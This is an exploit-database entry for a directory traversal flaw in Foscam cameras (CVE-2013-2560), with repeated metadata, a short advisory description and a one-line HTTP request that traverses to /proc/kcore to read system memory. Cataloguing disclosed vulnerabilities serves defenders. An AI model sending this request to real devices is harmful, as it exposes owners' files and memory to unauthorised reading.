Foscam < 11.37.2.49 - Directory Traversal
| EKU-ID: 42754 | CVE: CVE-2013-2560;OSVDB-90821 | OSVDB-ID: |
| Author: Frederic Basse | Published: 2013-03-01 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 42754 | CVE: CVE-2013-2560;OSVDB-90821 | OSVDB-ID: |
| Author: Frederic Basse | Published: 2013-03-01 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/58290/info
Foscam is prone to a directory-traversal vulnerability.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. This may aid in further attacks.
GET //../proc/kcore HTTP/1.0